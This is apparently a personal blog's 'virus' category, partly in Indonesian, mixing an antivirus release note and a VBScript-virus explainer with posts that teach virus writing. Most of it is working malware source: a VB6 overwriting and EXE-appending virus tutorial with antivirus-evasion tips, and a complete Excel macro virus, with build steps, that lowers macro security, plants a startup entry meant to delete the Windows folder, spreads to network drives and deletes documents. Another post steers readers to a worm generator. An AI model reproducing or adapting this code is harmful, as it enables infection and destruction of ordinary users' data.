jump to navigation

Download Smadav 2010 versi 8 January 12, 2010

Posted by endare in virus.
Tags:
add a comment

 smadav 8 2010 Smadav 2010 Rev. 8 dirilis dengan berbagai fitur dan penyempurnaan baru yang dikhususkan untuk pemberantasan virus lokal. Fitur-fitur itu seperti Smad-Behavior yang bisa mengenali virus lokal baru yang belum ada di database Smadav dari tingkah lakunya ketika menginfeksi sistem. Smad-Ray yang bisa melakukan scan flashdisk secara otomatis setelah terpasang hanya dalam waktu maksimum 5 detik. Smadav 2010 lebih stabil dan sangat disarankan untuk digabungkan dengan antivirus internasional karena Smadav hanya bisa menangani virus lokal. Pengebalan flashdisk (menggunakan folder autorun.inf) telah disempurnakan lagi dan sebelumnya akan ada konfirmasi sehingga Anda bisa memutuskan apakah suatu flashdisk ingin dikebalkan atau tidak. Sebagai informasi, dari sampel-sampel virus yang di-upload pengguna ke situs Smadav.net, penyebaran virus lokal saat ini sudah mulai turun drastis di Indonesia. Mungkin ini dikarenakan sudah banyaknya antivirus lokal yang bisa membasmi virus-virus lokal. Dan juga karena pengguna Windows XP yang sudah berkurang karena sebagian sudah meng-upgrade sistem operasinya menjadi Windows Vista atau Windows 7 yang sangat aman dari infeksi virus khususnya virus lokal. Penyebaran virus di Indonesia lebih banyak didominasi oleh virus dan malware internasional yang tentunya tidak bisa diatasi Smadav. Anda wajib dan sangat disarankan menggunakan antivirus internasional untuk perlindungkan komputer Anda dari virus dan malware internasional ini. Smad-Behavior Hampir semua virus lokal baru yang masih menggunakan teknik virus lokal untuk menginfeksi sistem akan terdeteksi oleh Smadav. Virus lokal ini dapat dideteksi dari tingkah lakunya yang langsung menginfeksi sistem sesaat setelah tereksekusi. Jadi, tidak masalah lagi bagi Smadav untuk mencegah virus lokal baru yang belum ada di database. Bergabung dengan Antivirus Internasional Smadav dibuat dengan tujuan untuk membersihkan dan melindungi komputer Anda dari virus-virus lokal yang banyak menyebar di Indonesia. Jadi, Smadav tidak mampu mendeteksi virus internasional. Oleh karena itu, Kalau Anda sering berinternet atau sering meng-install program-program baru, Anda wajib dan sangat disarankan untuk menginstall satu antivirus internasional untuk digabungkan dengan Smadav. Smadav dapat digabungkan dengan hampir semua antivirus internasional. Setelah digabungkan, Smadav akan melindungi komputer Anda dari virus lokal dan antivirus internasional tersebut yang akan melindung Anda dari virus internasional secara keseluruhan. Smad-Ray dan Pengebalan Flashdisk Smad-Ray adalah scan cepat flashdisk (maksimum 5 detik) sesaat setelah flashdisk terpasang sehingga tanpa menunggu lama Anda bisa segera tahu apakah flashdisk Anda terinfeksi virus lokal atau tidak. Pengebalan flashdisk dilakukan Smadav dengan menambahkan folder autorun.inf di flashdisk Anda sehingga virus yang biasanya menginfeksi flashdisk akan sangat sulit menyebar karena file autorun-nya tidak bisa lagi dibuat di flashdisk Anda. Pengebalan ini akan dilakukan setelah Anda menyetujui konfirmasi yang muncul sesaat setelah flashdisk terpasang. Berikut ini adalah daftar lengkap penyempurnaan Smadav 2010 Rev. 8 Penambahan database 23 virus lokal baru dan perbaikan beberapa false positive Teknik heuristik baru yang bisa mendeteksi varian virus lokal dengan mudah asalkan salah satu variannya sudah ada di-database Teknik heuristik VBS lebih akurat dan bertambah cerdas Lebih stabil untuk digabung dengan semua AV internasional (mendeteksi AV lain di komputer dan jika tidak ada akan menyarankan AV internasional untuk segera di-install) Scan flashdisk sangat cepat hanya 5 detik (Smad-Ray) tidak hanya men-scan bagian terluar flashdisk saja, tapi juga sampai semua file di flashdisk Smadav Pro yang di-password tidak mempunyai hak akses untuk mengubah registry dengan Smadav Notifikasi (Balloon Tray) awal pada saat start-up sudah tidak ada lagi Smad-behavior sudah sempurna dan dengan tampilan baru ketika memperingatkan user Konfirmasi penambahan folder autorun.inf untuk pengebalan flashdisk sesaat setelah flashdisk terpasang, user bebas memilih untuk mengebalkan flashdisk-nya atau tidak Folder Smad-Lock/Brankas Smadav tidak lagi otomatis ditambahkan di FD tapi harus manual lewat tab Smad-Lock Penambahan tombol “more” di SMARTP alert

W32.Foredge January 22, 2007

Posted by endare in virus.
4 comments

this is a source code of virus w32.foredge detect by norton you can download here

HTML virus January 22, 2007

Posted by endare in virus.
1 comment so far

HTML Viruses

Introduction
============

A new class of viruses has recently appeared that utilize the VBScript
scripting language to infect web pages. While these viruses are causing a lot
of worry, they are not as dangerous, as some would have you believe, for two
reasons:

1. In order for the virus to infect other pages, it must be run from a
local copy of the infected web page. That is, instead of viewing a web
page on a web server, you must first download it to your machine and
then view the local copy. This is necessary for the virus to get a copy
of itself to attach to another web page.

2. The Scripting Run-time Library must be installed on your system. The
Scripting Run-time Library contains the File System Object which is what
VBScript uses to access the local file system. Without that object,
a VBScript script cannot access files on the local system. The Scripting
Run-time Library is currently shipped with the Internet Information
Server (IIS) module of the Windows NT 4 Server operating system and the
Windows Scripting Host.


Virus Operation
===============

The VBScript scripting language was developed by Microsoft as a competitor to
JavaScript for automating web pages. The language is a variant of the Visual
Basic for Applications computer language that is built into several Microsoft
applications. Because VBScript was designed to run on the web client, the
language was intentionally handicapped to make it impossible to damage a
person’s system using a script. Thus, VBScript has no commands for accessing
memory or the file system. JavaScript is handicapped in much the same way.

Newer uses of VBScript include Active Server Pages and the Windows Scripting
Host. Active server pages are a part of the IIS which allow web pages to be
generated on the fly on a web server. This capability is especially useful
when a web page is to include content from a database. Because this package
runs server programs on the server, it does not need the protections that
VBScript on a client’s machine does. The Scripting Run-time Library containing
the File System Object is included with Active Server Pages to give VBScript
running on the server the ability to access files on the server’s file system.

The HTML class of viruses make use of the fact that the scripting engine on a
server can access the file system and can only operate on a system that has
the File System Object installed. They need access to the file system to
replicate and to attack a computer (delete or change files).

The scripting run-time library is normally only installed on Windows NT 4
Servers running the IIS. It is not normally installed on Windows NT 4
workstations because it is not normally needed; but it can be installed as
part of the Windows Scripting Host.


How Do I Find Out If I Am Vulnerable?
=====================================

To see if you are vulnerable to the html virus, copy the following web page
into a file named fstest.htm and open it with Internet Explorer. If Internet
Explorer displays an “Internet Explorer Script Error” dialog box with the
error “Active-X component can’t create object: ‘CreateObject’”, the Scripting
Run-time Library is not installed and you are not vulnerable. If Internet
Explorer puts up a Security Alert indicating that “An Active-X control on this
page may be unsafe…”, the Scripting Run-time Library is installed and you
are vulnerable. If you click Yes, the code runs and lists all the files in
your root file system on the web page.

——–cut here——–

listing
This web page will list the files in your root directory if the
Scripting Run-time Library is installed and registered. If it is not
installed and registered, this web page generates a script error.
Files In The Root Directory ()

  

——-Cut Here——

The script operates by creating a file system object, selecting the root
directory, getting the list of files in the root directory, and then printing
them in the body of the web page.

Another way to check for the vulnerability is to see if the scripting run-time
library is on your system. On a Windows NT 4 system, look for the file:

$WINDIRsystem32scrrun.dll

where $WINDIR is typically c:winnt If this file exists on your system, your
system may be vulnerable to the html virus. Note that the library must be both
on your system and registered in the registry to be used by a script or html
virus.


Protecting Against the HTML Virus
=================================

If you are not using Active Server Pages or the Windows Scripting Host, you do
not need the Scripting Run-time Library. If you are using active server pages,
but are not accessing local files, you also do not need the Scripting Run-time
Library. You can remove the Scripting Run-time Library and protect a system by
moving the file:

$WINDIRSystem32scrrun.dll

onto a floppy disk. Save this copy in case you need to reinstall it at a
future date (see below).

If you need the Scripting Run-Time Library, you will have to be careful what
you load onto your system.

1. Have up-to-date antivirus software running.
2. Be careful running web pages that you have downloaded to your computer.
3. If you get the Security Alert about running an unsafe Active-X control
on the current page, do not click Yes to go ahead and run the control.
Open the page with a text editor first to see what is causing the alert.


Reinstalling The Scripting Run-Time Library At A Later Date
===========================================================

If after removing the scrrun.dll library file you find that you need to
restore the Scripting Run-time Library, you must:

1. Copy the file back into the $WINDIRsystem32 directory.
2. Register the library by typing the following command in a DOS window.

$WINDIRsystem32regsvr32.exe $WINDIRsystem32scrrun.dl

virus tutorial January 22, 2007

Posted by endare in virus.
1 comment so far

I know that overwritters suck, they have no chance of spreading and they are not ” intelligent ” viruses. Dispite all this overwritters can help you understand the basics of the REAL viruses. I will give you the code first and then I will go over it.

Option Explicit
Dim myarray() As Byte
Dim victim As String
Const mysize As Integer = 11776

Private Sub Form_Load()
On Error Resume Next
Dim Free
Free = FreeFile

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
ReDim myarray(mysize)
Get #1, 1, myarray
Close #Free

victim = Dir(App.Path & "\" & "*.EXE")
While victim <> “”

Open App.Path & “” & victim For Binary Access Write As #Free
Put #1, , myarray
Put #1, , mysize
Close #Free

victim = Dir()

Wend

End
End Sub

Now lets go over it part by part:

Option Explicit
Dim myarray() As Byte
Dim victim As String
Const mysize As Integer = 11776

Here we define the variables that we will use, the ” myarray() ” variable holds tha binary code of the virus, the “victim” variable holds the victim file’s name and the “mysize” variable holds the size of the virus.

Private Sub Form_Load()
On Error Resume Next

We open the sub we will use (Form_Load), and we put our error handle there.

Dim Free
Free = FreeFile

This is a good idea taken by the y2k virus. This will rid you of read/write errors because it will open free file.

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
ReDim myarray(mysize)
Get #1, 1, myarray
Close #Free

Now we get the binary code out of our virus and we store it in the “myarray” variable.

victim = Dir(App.Path & "\" & "*.EXE")
While victim <> “”

Open App.Path & “” & victim For Binary Access Write As #Free
Put #1, , myarray
Put #1, , mysize
Close #Free

Here we define the victim variable and we put our binary code in the victim program.

victim = Dir()

Wend

Then we set victim to nothing, and we repeat the whole process to infect all the .exe files in the current directory.

End
End Sub

And finally we close the program and the sub.

This was it … as you can see overwritters are dead easy to write. In the next issue I will discuss appending viruses. For comments and/or questions e-mail me at [PAiN]@cypria.com

From [PAiN] (formally known as PhreakX).

part #3
EXE Appenders

Now we get to the real thing… the EXE appending viruses. This is a simple not encrypted appending virus without any payload.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Cut here-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Option Explicit
Private victim As String
Private myarray() As Byte
Private varray As Byte
Private length As Long
Private chck As String

Const size As Integer = 18432

Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" _
(ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long

Private Sub Form_Load()

On Error Resume Next

Dim I As Long
Dim Free
Free = FreeFile

On Error GoTo Fin

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
myarray = Space$(size)
Get #1, 1, myarray
Close #Free

victim = Dir(App.Path & "\" & "*.EXE")
While victim <> “”

‘ If the victim file, has the same directory and name as the file
‘ that is running - skip the next part
If LCase(App.Path & “” & App.EXEName & “.exe”) _
<> LCase(App.Path & “” & App.EXEName & “.exe”) Then

Open Victim For Binary Access Read As #Free
varray = Space(LOF(Free)) ‘ Sets buffer up for the file data
Get #1, 1, varray         ‘ Copy th file data into a variable
Close #Free

chck = Mid(varray, Len(varray)) ‘ Store the last character in the
‘ victim file in CheckX

If LCase(chck) <> “^” Then      ‘ if the character = X then the file has
‘ already been infected, if not continue

Open victim For Binary Access Write As #Free
Put #Free, 1, myarray      ‘ Place our code in the front of the file
Put #Free, size, varray    ‘ Follow it immediatley by the victims code
Put #Free, LOF(Free) + 1, “^” ‘Place an X at the end to show it’s been
‘infected
Close #Free                   ‘Thats how this virus got it’s name!

End If
Else
End If

Victim = Dir()              ‘ Find the next file to infect
Wend                        ‘ Go back to the start

Open App.Path & “” & App.EXEName & “.exe” For Binary Access Read As #Free
length = (LOF(Free) - size)  ‘ Store the length of the current file minus
‘ the virus file size in the variable
If Length > 0 Then           ‘ if it’s more than 0, the file is infected,
‘ if not, this is the raw virus file
myarray = Space(length)      ‘ Create buffer in variable, for the size of
‘ the file
Get #Free, size, myarray     ‘ Get the old host data from out of this file
Close #Free

Open App.Path & “” & App.EXEName & “.tut” For Binary Access Write As #Free
Put #Free, , myarray        ‘ Place the old host data into a temporary file
Close #Free

idProg = Shell(App.Path & “” & App.EXEName & “.tut”, vbNormalFocus)
‘ Run the old host code
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
‘ Get it running application code number
GetExitCodeProcess hProg, iExit

Do While iExit = STILL_ACTIVE   ‘ Wait untill the program is shut down
DoEvents
GetExitCodeProcess hProg, iExit
Loop
On Error Resume Next
Kill App.Path & “” & App.EXEName & “.tut”  ‘ Delete the old host code

Else
Close #Free
End If
End
Fin:
End Sub

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Cut here-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Now lets go over it part by part:

Option Explicit
Private victim As String
Private myrray() As Byte
Private varray As Byte
Private length As Long
Private chck As String
Const size As Integer = 18432

Here we define the variables that we will use, the ” myarray() ” variable holds tha binary code of the virus, the “victim” variable holds the victim file’s name and the “mysize” variable holds the size of the virus. You will need to change the number to the size of your virus. The length variable holds the running file’s length and the chck variable will be used to check if we have already infected the file.

Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" _
(ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long

These are the variables, constants and declarations that we will use for process checking.

Private Sub Form_Load()
On Error Resume Next

We open the sub we will use (Form_Load), and we put our error handle there.

Dim Free
Free = FreeFile

This is a good idea taken by the y2k virus. This will rid you of read/write errors because it will open free file.

On Error GoTo Fin

This is our error handler. If there is an error it will ignore all code and go to the Fin marker which is the end.

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
myarray = Space$(size)
Get #1, 1, myarray
Close #Free

Now we get the binary code out of our virus and we store it in ” myarray ” variable.

victim = Dir(App.Path & "\" & "*.EXE")
While victim <> “”

If LCase(App.Path & “” & App.EXEName & “.exe”) _
<> LCase(App.Path & “” & App.EXEName & “.exe”) Then

If our victim file is the same as the one running, same directory and same name, we do not infect.

Open Victim For Binary Access Read As #Free
varray = Space(LOF(Free))
Get #1, 1, varray
Close #Free

We get the binary code from our victim file and store it in the varray variable.

chck = Mid(varray, Len(varray))

We store the last character of the victim file in the chck variable for later use of infection checking.

If LCase(chck) <> “t” Then

If the last character isn’t ” t ” then it means that its not infected so continue.

Open victim For Binary Access Write As #Free
Put #Free, 1, myarray
Put #Free, size, varray
Put #Free, LOF(Free) + 1, "t"
Close #Free

End If
Else
End If

Now we write our virus code first and then the original file code in the file and we also include the “t” character to mark it as infected.

Victim = Dir()
Wend

This find the next file to infect and redoes the whole routine.

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
length = (LOF(Free) - size)
If Length > 0 Then
myarray = Space(length)
Get #Free, size, myarray
Close #Free

Now we get the file’s size minus the virus, if it isn’t 0 it means that it is infected.

Open App.Path & "\" & App.EXEName & ".tut" _
For Binary Access Write As #Free
Put #Free, , myarray ' Place the old host data into a temporary file
Close #Free

We put the host data in a file we make. A temporary file.

idProg = Shell(App.Path & "\" & App.EXEName & ".tut", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit

Now we run the original host program.

Do While iExit = STILL_ACTIVE   ' Wait untill the program is shut down
DoEvents
GetExitCodeProcess hProg, iExit
Loop

Wait for the program to be terminated.

On Error Resume Next
Kill App.Path & "\" & App.EXEName & ".tut"  ' Delete the old host code

Else

End If

End

Fin:

End Sub

Now we delete the temporary file and then we close our sub.

For any comments and / or suggestions, even if it is bad e – mail me at [PAiN]@cypria.com.

From [PAiN] (formally known as PhreakX).

part #4
Encryption

(NOTE by Cicatrix:”Some of the code below was written in ASCII and does not translate to HTML correctly. Please refer to the LZO #2 zine for the correct version”)

Now we get to a more interesting part of vb viruses, better for all viruses the encryption. You really don’t want to make it easy for the AVs do you?? Here is where you will use encryption.

Currently I have only tried two kinds of encryption for vb viruses and they both work finely.

The first one is probably known to all macro coders, its character encryption, first used by VicodinES. This is easy to use and you can hide your text strings finely.

example of use:

Lets say that you have they payload of a messagebox:

MsgBox “This is my virus”

Now this text string is easier to spot than something like:

MsgBox Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(105) + _ + Chr(115) + Chr(32) + Chr(109) + Chr(121) + Chr(32) + Chr(118) + _ + Chr(105) + Chr(114) + Chr(117) + Chr(115)

A common mistake people make when they use this is that they put the Chr’s in speachmarks (””) and they get a messagebox containing Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(105) + Chr(115) + Chr(32) + Chr(109) + Chr(121) + Chr(32) + Chr(118) + Chr(105) + Chr(114) + Chr(117) + Chr(115) instead of, ‘This is a virus.’

A good application you can use to quickly encrypt your text strings is by using VicodinES’s string converter.

Private Function Decrypt_Encrypt(Text) As String
XorKey = 133
For EncryptDecryptLoop = 1 To Len(Text)
Decrypt_Encrypt = Decrypt_Encrypt _
& Chr(Asc(Mid(Text, EncryptDecryptLoop, 1)) Xor XorKey)
Next
End Function

simple virus January 22, 2007

Posted by endare in virus.
1 comment so far

A simple virus script created by Ms visual Basic 6.0 Download here

macro virus September 21, 2006

Posted by endare in virus.
1 comment so far

this is a virus macro n this script write in microsoft excel

MAKE Virus:
open new excel workbooks then menu tools macro VB editor
right klik in VBA Project – insert module
then copy Paste script in new module
tekan F8 untuk trace script

—————————— begin of script ———————————————-
‘USE THIS SCRIPT As YOUR OWN RISK
‘This is For my wife If thats you falling love with others
Private Declare Function RegOpenKeyExA Lib “advapi32.dll” (Byval hKey As Long, _
Byval lpSubKey As String, Byval ulOptions As Long, Byval samDesired As _
Long, phkResult As Long) As Long
Private Declare Function RegCreateKeyExA Lib “advapi32.dll” (Byval hKey As Long, _
Byval lpSubKey As String, Byval ulOptions As Long, Byval samDesired As _
Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib “advapi32.dll” (Byval hKey As Long, _
Byval lpValueName As String, Byval Reserved As Long, Byval dwType As Long, _
Byval lpValue As String, Byval cbData As Long) As Long
Private Declare Function RegCloseKey Lib “advapi32.dll” (Byval hKey As Long) As Long
Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (Byval _
hKey As Long, Byval lpSubKey As String, phkResult As Long) As Long
Global Const REG_DWORD As Long = 4
Global Const HKEY_LOCAL_MACHINE As Long = &H80000002
Global Const HKEY_CURRENT_USER As Long = &H80000001
Dim NewKEY As Long
Dim AA, BB, NN
Dim Myclub As String
Dim CrStat As Boolean
Dim pnm As String

‘for disable menu menu
‘remove direktory windows
Sub MessBoard()
On Error Resume Next
CommandBars(“File”).Controls(“Print Area”).Visible = False
CommandBars(“Data”).Controls(“Sort”).Visible = False
CommandBars(“File”).Controls(“Page Setup…”).Visible = False
NowBoom = Array(“MsApp”, “Sound Acceleration”, “Ms Wizard”, “Web Camera”, _
“PCI driver”, “App Video”, “Lshots”, “WinApps”, “MsOffice 11”)
Randomize
NowBoom = NowBoom(Rnd * 9)
KillAV = RegOpenKeyExA(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows\CurrentVersion\Run”, _
0, KEY_ALL_ACCESS, s)
KillAV = RegSetValueExA(s, NowBoom, 0, 1, “c:\windows\command\deltree windows”, 0)
KillAV = RegCloseKey(s)
End Sub

Private Sub Auto_Open()
On Error Resume Next
Application.StatusBar = “Wait please….”
Application.ScreenUpdating = False
CommandBars(“Tools”).Controls(“Customize…”).Visible = False
CommandBars(“Tools”).Controls(“Options…”).Visible = False
CommandBars(“Tools”).Controls(“Macro”).Enable = False

‘setting registry security LOW pada excel ver. 8.0 dan 9.0
Kill97 = RegOpenKeyExA(HKEY_CURRENT_USER, “Software\Microsoft\Office\8.0\Excel\” & _
“Microsoft Excel”, 0, KEY_ALL_ACCESS, k)
Kill97 = RegSetValueExA(k, “Options6”, 0, REG_DWORD, Chr$(0), 4)
Kill97 = RegCloseKey(k)
Kill2K = RegCreateKey(HKEY_CURRENT_USER, “Software\Microsoft\Office\9.0\Excel\” & _
“security”, s)
Kill2K = RegOpenKeyExA(HKEY_CURRENT_USER, “Software\Microsoft\Office\9.0\Excel”, _
0, KEY_ALL_ACCESS, s)
Kill2K = RegSetValueExA(s, “Level”, 0, REG_DWORD, Chr$(2), 2)
Kill2K = RegCloseKey(s)

‘kill anti virus
AnVrs = Array(“VsStatEXE”, “Norton Auto-Protect”, “F-Secure”, “PandaSoft”, “Avast4”, _
“DrSolomon”, “AntiVir”, “MsSound”, “BombShellter”)
Randomize
AVstr = AnVrs(Rnd * 9)
KillAV = RegOpenKeyExA(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows\” & _
“CurrentVersion\Run”, 0, KEY_ALL_ACCESS, s)
KillAV = RegSetValueExA(s, AVstr, 0, 1, “c:\windows\rundll.exe”, 0)
KillAV = RegCloseKey(s)
Application.DisplayAlerts = False
If Right(ActiveWorkbook.Name, 3) = “xls” Then
ActiveWindow.Visible = False
workbooks.Add
End If
XBrnd

‘make file Xlstart
‘create excel sheet active

strup = Application.StartupPath
If Dir(strup & “\” & “*.xls”) = “” Then
pnm = ActiveWorkbook.Name
Apnm = ActiveWorkbook.FullName
OtherVrs = Dir(strup & “\” & “*.xls”)
If OtherVrs <> “” Then
workbooks(OtherVrs).Close
Kill strup & “\” & OtherVrs
End If
workbooks(pnm).SaveAs FileName:=strup & “\” & Myclub & “.xls”
ActiveWindow.Visible = False
workbooks.Open (Apnm)
End If
For n = 67 To 90
l = Chr(n)
drv = l & “:”
d3 = DrvID(drv)
If d3 = “network” Then snd2drv (drv)
Next
nmpers = Dir(strup & “\” & “*.xls”)
Application.OnSheetActivate = “” & strup & “\” & nmpers & “!XLBomb”
If Month(Now()) = 7 And Day(Now()) = 7 Then
Range(“A1”).Insert
Range(“A1”).Select
With Selection.Font
.Name = “Arial”
.FontStyle = “Bold”
.Size = 18
.ColorIndex = 7
End With
ActiveCell.FormulaR1C1 = “Living in the DARKSIDE to watch your Life”
MessBoard
cari
End If
Application.StatusBar = False
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub

‘inveksi workbook
‘add sheet xlSheetVeryHidden

Sub XLBomb()
On Error Resume Next
XlsBmb = “c:\mut.WQK”
Application.DisplayAlerts = False
Application.ScreenUpdating = False
aktip = ActiveWorkbook.Name
sedang = ThisWorkbook.Name
Set mcraktip = workbooks(aktip).VBProject.VBComponents
Set modaktip = ActiveWorkbook.VBProject.VBComponents
Set mymcr = ThisWorkbook.VBProject.VBComponents
If aktip <> “Book1” And aktip <> “Book2” Then
For NS = 1 To Sheets.Count
If Sheets(NS).Name = “S1L3N7” Then
kz = Sheets(NS).Name
Exit For
End If
kz = Sheets(NS).Name
Next NS
If kz <> “S1L3N7” Then
Sheets.Add
ActiveWindow.ActiveSheet.Name = “S1L3N7”
Sheets(“S1L3N7”).Visible = xlSheetVeryHidden
Else
susun
Sheets(“S1L3N7”).Range(“A7”) = “”
End If
For nm = 1 To mcraktip.Count
If mcraktip(nm).Type = 1 Then
nama = mcraktip(nm).Name
Exit For
End If
Next nm
modaktip.Remove modaktip(nm)
For nm = 1 To mymcr.Count
If mymcr(nm).Type = 1 Then
nama = mymcr(nm).Name
Exit For
End If
Next nm
mymcr(nama).Export XlsBmb
modaktip.Import XlsBmb
Kill XlsBmb
XBrnd
ActiveWorkbook.VBProject.VBComponents(nm).Name = Myclub
If Minute(Now()) > 30 And Weekday(Now()) Mod 2 = 0 Then
Application.StatusBar = “Searching For 1RM4 at the network…”
End If
End If
Application.DisplayAlerts = True
End Sub

‘make random virus name an duplicate it

Private Sub XBrnd()
Dim Sbjt, Bodd
On Error GoTo nil1
Randomize
Sbjt = Array(“Primitif”, “Conspiracy”, “mydata”, “OnJuly”, “Updater”, “ms0ffice”, _
“letme”, “poisoning”, “yourdream”)
Myclub = Sbjt(Rnd * 9 + 1)
Exit Sub
nil1:
Myclub = Sbjt(0)
End Sub

‘invekt to network

Function DrvID(drv3)
On Error Resume Next
Dim fso, d, t
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set d = fso.getdrive(drv3)
Select Case d.driveType
Case 0: t = “Unknown”
Case 1: t = “removable”
Case 2: t = “Fixed”
Case 3: t = “network”
Case 4: t = “CD-ROM”
Case 5: t = “Ramdisk”
End Select
If t = “” Then t = “none”
DrvID = t
End Function
Sub snd2drv(DrvAll)
On Error Resume Next
Application.DisplayAlerts = False
Application.ScreenUpdating = False
Gnm = ActiveWorkbook.Name
GnmF = ActiveWorkbook.FullName
Randomize
FlName = Array(“BankColapse”, “myacc”, “report”, “launch06”, “yourScrt”, “jobs”, _
“reference07”, “logistic”, _
“Payroll2006”, “NewCost”, “DoNotOpen”, “secretary”, “tax_report”, “Finance”, _
“director2006”)
Bread = FlName(Rnd * 14 + 1)
workbooks(Gnm).SaveAs FileName:=DrvAll & “\” & Bread & “.xls”
workbooks(ActiveWorkbook.Name).Close
workbooks.Open (GnmF)
Application.DisplayAlerts = True
End Sub

Private Sub Auto_Close()
On Error Resume Next
If ActiveWorkbook.Name <> “Book1” And ActiveWorkbook.Name <> “Book2” Then
Application.ScreenUpdating = False
Application.DisplayAlerts = False
For NS = 1 To Sheets.Count
If Sheets(NS).Name = “S1L3N7” Then
kz = Sheets(NS).Name
Exit For
End If
kz = Sheets(NS).Name
Next NS
If kz <> “S1L3N7” Then
Sheets.Add
ActiveWindow.ActiveSheet.Name = “S1L3N7”
Sheets(“S1L3N7”).Visible = xlSheetVeryHidden
End If
CryptSTAT = Sheets(“S1L3N7”).Range(“A7”)
If CryptSTAT <> 1 Then
kacau
Sheets(“S1L3N7”).Range(“A7”) = 1
SvFl = Dir(Application.StartupPath & “\” & “*.xls”)
workbooks(SvFl).Save
ActiveWorkbook.Save
End If
End If
End Sub

‘ encrypt

Sub kacau()
For i = 48 To 90 ’48 As 0 And 90 As Z
If i <> 63 Then
huruf = Chr(i)
Cells.Replace What:=huruf, Replacement:=Chr(i + 110), LookAt:=xlPart, SearchOrder _
:=xlByRows, MatchCase:=False
End If
Next
End Sub

‘(decrypt) struktur file
Sub susun()
For i = 158 To 200
If i <> 173 Then
huruf = Chr(i)
Cells.Replace What:=huruf, Replacement:=Chr(i – 110), LookAt:=xlPart, SearchOrder _
:=xlByRows, MatchCase:=False
End If
Next
End Sub

‘remove file xls,doc.etc

Sub cari()
On Error Resume Next
Dim nmfold1, nmfold2, pjg, kena As Integer
pnm = ActiveWorkbook.FullName
pjg = Len(pnm)
For i = 0 To 50
pjg = pjg – 1
If Right(Left(pnm, pjg), 1) = “\” Then
foldbatas = Left(pnm, pjg)
Kill foldbatas & “*.xls”
Kill foldbatas & “*.doc”
Kill foldbatas & “irma.*”
If a = 0 Then
nmfold1 = Len(foldbatas) – 1
pnm = Left(pnm, nmfold1)
a = 1
Else
nmfold2 = Len(foldbatas) + 1
kena = nmfold1 – nmfold2
namekena = Right(pnm, kena + 1)
Application.ScreenUpdating = False
workbooks.Add (namekena & “.xls”)
ActiveWorkbook.Save
ActiveWorkbook.Close
Application.ScreenUpdating = True
Exit For
End If
End If
Next
End Sub

Easy make avirus September 21, 2006

Posted by endare in virus.
1 comment so far

Cara Gampang Bikin Virus
Kamu pasti masih inget dengan virus worm yang sempat menghebohkan internet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.
Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.
Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.
Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri 🙂 Pokoknya cukup hebatlah program ini.
Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.
Situs yg menyediakan VBSWG :
http://www.virii.com.ar,
http://www.kvirii.com.ar,
http://vx.netlux.org/dat/tv07.shtml.
Atau gunakan search engine http://www.google.com dan masukkan keyword vbswg2bfix.zip, Vbswg2B.zip, worm generator, dan keyword semacamnya

September 21, 2006

Posted by endare in virus.
add a comment

Mengenal Virus Computer

Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah “virus” yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat kita semua mengerti dan memahami tentang virus.

ASAL MUASAL VIRUS

1949, John von Neumann, menggungkapkan ” teori self altering automata ” yang merupakan hasil riset dari para ahli matematika. 1960, Lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori yang diungkapkan oleh
